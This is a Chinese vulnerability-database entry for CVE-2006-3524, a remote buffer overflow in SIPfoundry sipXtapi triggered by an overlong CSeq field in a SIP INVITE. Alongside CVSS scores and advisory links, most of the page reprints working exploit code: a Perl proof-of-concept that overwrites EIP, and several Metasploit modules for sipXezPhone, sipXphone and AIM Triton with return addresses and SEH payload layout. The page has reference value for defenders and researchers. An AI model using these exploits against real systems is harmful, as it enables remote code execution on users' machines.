CVE-2006-3524
CVSS7.5
发布时间 :2006-07-11 20:05:00
修订时间 :2011-03-07 21:38:50
NMCOEP    

[原文]Buffer overflow in SIPfoundry sipXtapi released before 20060324 allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE message.


[CNNVD]SIPfoundry sipXtapi畸形CSeq字段处理远程缓冲区溢出漏洞(CNNVD-200607-149)

        sipXtapi是一个简单易用的软件开发工具包(SDK),用于开发各种单机或集成的SIP客户端。
        sipXtapi库在解析请求中CSeq字段时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        远程攻击者可以通过发送长度大于24个字节的CSeq字段数据触发这个漏洞,导致控制EIP从而执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3524
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-149
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2735
(UNKNOWN)  VUPEN  ADV-2006-2735
http://www.securityfocus.com/bid/18906
(UNKNOWN)  BID  18906
http://securitytracker.com/id?1016455
(UNKNOWN)  SECTRACK  1016455
http://secunia.com/advisories/20997
(VENDOR_ADVISORY)  SECUNIA  20997
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047794.html
(UNKNOWN)  FULLDISC  20060711 ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047757.html
(UNKNOWN)  FULLDISC  20060710 ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
http://xforce.iss.net/xforce/xfdb/27681
(UNKNOWN)  XF  sipxtapi-cseq-bo(27681)
http://www.securityfocus.com/archive/1/archive/1/440135/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060711 Re: [Full-disclosure] ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
http://www.securityfocus.com/archive/1/archive/1/439617/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060710 ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
http://www.osvdb.org/27122
(UNKNOWN)  OSVDB  27122

- 漏洞信息

SIPfoundry sipXtapi畸形CSeq字段处理远程缓冲区溢出漏洞
高危 缓冲区溢出
2006-07-11 00:00:00 2006-07-18 00:00:00
远程  
        sipXtapi是一个简单易用的软件开发工具包(SDK),用于开发各种单机或集成的SIP客户端。
        sipXtapi库在解析请求中CSeq字段时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        远程攻击者可以通过发送长度大于24个字节的CSeq字段数据触发这个漏洞,导致控制EIP从而执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.sipfoundry.org/index.html

- 漏洞信息 (2000)

SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC (EDBID:2000)
hardware dos
2006-07-10 Verified
0 Michael Thumann
N/A [点击下载]
#!/usr/bin/perl
# PoC Exploit By mthumann@ernw.de
# Remote Buffer Overflow in sipXtapi

use IO::Socket;
#use strict;


print "sipXtapi Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
        print "Usage: sipx.pl <host>\n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";

#EoF

# milw0rm.com [2006-07-10]
		

- 漏洞信息 (16351)

SIPfoundry sipXezPhone 0.35a CSeq Field Overflow (EDBID:16351)
windows remote
2010-06-15 Verified
0 metasploit
N/A [点击下载]
##
# $Id: sipxezphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in SIPfoundry's
				sipXezPhone version 0.35a. By sending an long CSeq header,
				a remote attacker could overflow a buffer and execute
				arbitrary code on the system with the privileges of
				the affected application.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					['CVE', '2006-3524'],
					['OSVDB', '27122'],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',

			'Targets'        =>
				[
					['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],
				],

			'Privileged'     => false,

			'DisclosureDate' => 'Jul 10 2006',

			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(5060)
			], self.class)
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s
		filler = rand_text_english(260, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[252, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end
		

- 漏洞信息 (16352)

SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow (EDBID:16352)
windows remote
2010-06-15 Verified
0 metasploit
N/A [点击下载]
##
# $Id: sipxphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in SIPfoundry's
				sipXphone 2.6.0.27. By sending an overly long CSeq value,
				a remote attacker could overflow a buffer and execute
				arbitrary code on the system with the privileges of
				the affected application.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					[ 'CVE', '2006-3524' ],
					[ 'OSVDB', '27122' ],
					[ 'BID', '18906' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 10 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(5060)
			], self.class)
	end

	def exploit
		connect_udp

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s
		filler = rand_text_english(212, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[204, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		print_status("Trying target #{target.name}...")

		udp_sock.put(sploit)

		handler
		disconnect_udp

	end

end
		

- 漏洞信息 (16353)

AIM Triton 1.0.4 CSeq Buffer Overflow (EDBID:16353)
windows remote
2010-06-15 Verified
0 metasploit
N/A [点击下载]
##
# $Id: aim_triton_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AIM Triton 1.0.4 CSeq Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in AOL\'s AIM
				Triton 1.0.4. By sending an overly long CSeq value,
				a remote attacker could overflow a buffer and execute
				arbitrary code on the system with the privileges of
				the affected application.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					['CVE', '2006-3524'],
					['OSVDB', '27122' ],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 10 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(5061)
			], self.class)
	end

	def exploit
		connect_udp

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s
		filler = rand_text_english(792, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[780, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		print_status("Trying target #{target.name}...")

		udp_sock.put(sploit)

		handler
		disconnect_udp

	end

end
		

- 漏洞信息 (F83094)

SIPfoundry sipXezPhone 0.35a CSeq Field Overflow (PacketStormID:F83094)
2009-11-26 00:00:00
MC  metasploit.com
exploit,remote,overflow,arbitrary
CVE-2006-3524
[点击下载]

This Metasploit module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending an long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in SIPfoundry's
				sipXezPhone version 0.35a. By sending an long CSeq header,
				a remote attacker could overflow a buffer and execute 
				arbitrary code on the system with the privileges of 
				the affected application. 
			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-3524'],
					['OSVDB', '27122'],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],  
				],

			'Privileged'     => false,

			'DisclosureDate' => 'July 10 2006',

			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(5060)
			], self.class)
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s
		filler = rand_text_english(260, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[252, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end
    

- 漏洞信息 (F83080)

AIM Triton 1.0.4 CSeq Buffer Overflow (PacketStormID:F83080)
2009-11-26 00:00:00
MC  metasploit.com
exploit,remote,overflow,arbitrary
CVE-2006-3524
[点击下载]

This Metasploit module exploits a buffer overflow in AOL's AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AIM Triton 1.0.4 CSeq Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in AOL's AIM
				Triton 1.0.4. By sending an overly long CSeq value, 
				a remote attacker could overflow a buffer and execute 
				arbitrary code on the system with the privileges of 
				the affected application. 
			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-3524'],
					['OSVDB', '27122' ],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll 
				],
			'Privileged'     => false,
			'DisclosureDate' => 'July 10 2006',
			'DefaultTarget'  => 0))

			register_options(
    			[
            			Opt::RPORT(5061)
    			], self)

	end

	def exploit
		connect_udp

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s      
		filler = rand_text_english(792, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[780, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		print_status("Trying target #{target.name}...")
 
		udp_sock.put(sploit)

		handler
		disconnect_udp
                
	end

end
    

- 漏洞信息 (F82931)

SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow (PacketStormID:F82931)
2009-10-30 00:00:00
MC  metasploit.com
exploit,remote,overflow,arbitrary
CVE-2006-3524
[点击下载]

This Metasploit module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in SIPfoundry's
				sipXphone 2.6.0.27. By sending an overly long CSeq value, 
				a remote attacker could overflow a buffer and execute 
				arbitrary code on the system with the privileges of 
				the affected application. 
			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-3524'],
					['OSVDB', '27122'],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],  
				],
			'Privileged'     => false,
			'DisclosureDate' => 'July 10 2006',
			'DefaultTarget'  => 0))

			register_options(
    			[
            			Opt::RPORT(5060)
    			], self)

	end

	def exploit
		connect_udp

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s      
		filler = rand_text_english(212, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[204, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		print_status("Trying target #{target.name}...")
 
		udp_sock.put(sploit)

		handler
		disconnect_udp
                
	end

end
    

- 漏洞信息

27122
sipXtapi INVITE Message CSeq Field Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in SIPfoundry, Inc. siXtapi. The program fails to validate the length of the 'CSeq' field of an INVITE message resulting in a buffer overflow. With a specially crafted message, an attacker can run arbitrary code resulting in a loss of integrity.

- 时间线

2006-07-10 2006-03-20
2006-07-10 Unknow

- 解决方案

Upgrade to versions released on or after 2006-03-24, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站